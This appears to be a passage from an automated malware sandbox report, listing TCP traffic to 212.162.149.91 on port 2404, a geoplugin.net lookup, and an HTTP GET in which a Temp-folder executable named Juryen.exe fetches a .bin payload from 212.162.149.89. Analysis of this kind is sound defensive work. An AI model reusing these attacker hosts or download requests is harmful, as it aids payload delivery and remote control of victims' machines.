                                                                  Dec 10, 2024 16:29:05.936681986 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.936773062 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.938040018 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.938090086 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.938195944 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.939650059 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.939693928 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.939795971 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.941492081 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.941538095 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.941698074 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.942712069 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.942760944 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.942779064 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.943857908 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.943901062 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.943936110 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.944802999 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.944834948 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.945029020 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.945745945 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.945802927 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.945820093 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.946655035 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.946700096 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.946779966 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.947659969 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.947706938 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.947863102 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.949086905 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.949139118 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.949774027 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.950433969 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.950475931 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.950485945 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.951270103 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.951304913 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.951387882 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.952056885 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.952092886 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.952136993 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.953068972 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.953104019 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.953263998 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.954026937 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.954073906 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.954237938 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.955214024 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.955260038 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.955336094 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.956295967 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.956336021 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.956406116 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.957309961 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.957346916 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.957438946 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.958358049 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.958401918 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.958493948 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.959505081 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.959543943 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.959630013 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.960922956 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.960958958 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.961064100 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.962033033 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.962073088 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.962116957 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.963042021 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.963084936 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.075644970 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.075711966 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.075769901 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.075992107 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.076157093 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.076203108 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.077085972 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.077203989 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.077249050 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.078102112 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.078211069 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.078258038 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.079124928 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.079282045 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.079323053 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.080159903 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.080305099 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.080348015 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.081185102 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.081321001 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.081366062 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.082216978 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.082345963 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.082386017 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.083192110 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.083347082 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.083385944 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.084220886 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.084347963 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.084404945 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.085160017 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.085305929 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.085347891 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.086146116 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.086318016 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.086365938 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.087272882 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.087419033 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.087456942 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.088206053 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.088272095 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.088306904 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.089056969 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.089201927 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.089236975 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.090099096 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.090333939 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.090372086 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.091356993 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.091485023 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.091526985 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.109599113 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.109711885 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.109724998 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.109770060 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.110146046 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.110203028 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.110344887 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.110579014 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.110621929 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.111226082 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.111356974 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.111397028 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.112353086 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.112643957 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.112682104 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.113421917 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.113584995 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.113620996 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.114361048 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.114494085 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.114533901 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.115129948 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.115263939 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.115305901 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.116148949 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.116283894 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.116328001 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.117089033 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.117213964 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.117258072 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.118133068 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.118303061 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.118346930 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.119146109 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.119271040 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.119308949 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.120059967 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.120202065 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.120245934 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.121017933 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.121139050 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.121179104 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.121907949 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.122061014 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.122102976 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.122869968 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.123008966 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.123045921 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.123847961 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.124002934 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.124047995 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.125017881 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.125150919 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.125189066 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.125818014 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.125935078 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.125972986 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.126779079 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.126915932 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.126949072 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.127825975 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.127966881 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.127995968 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.128784895 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.128935099 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.128981113 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.129745007 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.129873991 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.129914045 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.130662918 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.130805016 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.130836964 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.131691933 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.131776094 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.131815910 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.132642031 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.132797956 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.132844925 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.133578062 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.133707047 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.133753061 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.134692907 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.134790897 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.134836912 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.135579109 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.135684013 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.135724068 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.136842012 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.136969090 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.137023926 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.137552977 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.137691975 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.137727976 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.138415098 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.138552904 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.138588905 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.139602900 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.139664888 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.139718056 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.140403986 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.140536070 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.140585899 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.141374111 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.141511917 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.141565084 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.142590046 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.142724037 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.142765999 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.143671036 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.143815994 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.143852949 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.267997980 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.268182993 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.268243074 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.268392086 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.268533945 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.268573999 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.269293070 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.269706964 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.269752979 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.269819975 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.270618916 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.270668983 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.270751953 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.271809101 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.271821976 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.271856070 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.272587061 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.272628069 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.272730112 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.273582935 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.273627043 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.273693085 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.274512053 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.274555922 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.274647951 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.275774956 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.275821924 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.276031971 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.276935101 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.276976109 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.277061939 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.277875900 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.277924061 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.277951956 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.278799057 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.278842926 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.278983116 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.279844046 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.279891968 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.280052900 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.280735016 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.280775070 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.280864954 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.281528950 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.281565905 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:09.193528891 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:09.313169003 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:09.313224077 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:09.313226938 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:09.313235998 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:09.313277006 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:09.313277960 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:09.313293934 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:09.313461065 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:09.313472986 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:09.313482046 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:09.313492060 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:09.313502073 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:09.313517094 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:09.313527107 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:09.432684898 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:09.432725906 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:09.432745934 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:09.432756901 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:09.432785034 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:09.432831049 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:09.433286905 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:09.433343887 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:24.488830090 CET240449793212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:24.502633095 CET497932404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:24.624699116 CET240449793212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:54.563580990 CET240449793212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:54.576924086 CET497932404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:54.696402073 CET240449793212.162.149.91192.168.2.7

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Dec 10, 2024 16:29:03.136287928 CET5804153192.168.2.71.1.1.1
                                                                  Dec 10, 2024 16:29:03.286854029 CET53580411.1.1.1192.168.2.7

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Dec 10, 2024 16:29:03.136287928 CET192.168.2.71.1.1.10x41dfStandard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Dec 10, 2024 16:29:03.286854029 CET1.1.1.1192.168.2.70x41dfNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                                  HTTP Request Dependency Graph

                                                                  • 212.162.149.89
                                                                  • geoplugin.net

                                                                  HTTP Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.749784212.162.149.89807864C:\Users\user\AppData\Local\Temp\Juryen.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 10, 2024 16:28:57.611057043 CET174OUTGET /wwVHOGRH148.bin HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                  Host: 212.162.149.89
                                                                  Cache-Control: no-cache
                                                                  Dec 10, 2024 16:28:58.760035038 CET1236INHTTP/1.1 200 OK
                                                                  Content-Type: application/octet-stream
                                                                  Last-Modified: Tue, 10 Dec 2024 10:02:23 GMT
                                                                  Accept-Ranges: bytes
                                                                  ETag: "d2c1ec9bea4adb1:0"
                                                                  Server: Microsoft-IIS/8.5
                                                                  Date: Tue, 10 Dec 2024 15:28:58 GMT
                                                                  Content-Length: 493120
